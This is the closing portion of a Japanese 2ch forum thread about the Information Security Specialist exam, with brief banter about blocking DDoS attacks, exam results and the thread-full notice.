DDoSなんてIISの設定で簡単に弾けるのに
995 :
名無し検定1級さん
2016/10/22(土) 14:52:57.89 ID:Tdaa3gMi
>>955-956 SCとNWで受験番号一桁になったことがあるけれども、両方とも合格だったよ(・∀・)
996 :
名無し検定1級さん
2016/10/22(土) 14:57:25.82 ID:361vkxCe
へーDNSサーバに対するDDoS攻撃がIISの設定で弾けるのかすげーなー
997 :
名無し検定1級さん
2016/10/22(土) 14:58:36.75 ID:YyDPmvDa
998 :
名無し検定1級さん
2016/10/22(土) 15:04:14.44 ID:f0lGwy1k
DDOSってbindのやつか?
999 :
名無し検定1級さん
2016/10/22(土) 15:09:11.18 ID:Xd8owoYI
にゃー
1000 :
名無し検定1級さん
2016/10/22(土) 15:10:02.79 ID:Xd8owoYI
にょー
1001 :
1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
life time: 5日 17時間 57分 55秒
1002 :
1002
Over 1000 Thread
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](http://esupport.trendmicro.com/media/12851667/JP-2075288-7.jpg)
![【ファイト*^o^*】情報セキュリティスペシャリスト 105 [無断転載禁止]©2ch.netYouTube動画>1本 ->画像>17枚](http://www.meti.go.jp/press/2016/10/20161021002/20161021002-a.jpg)
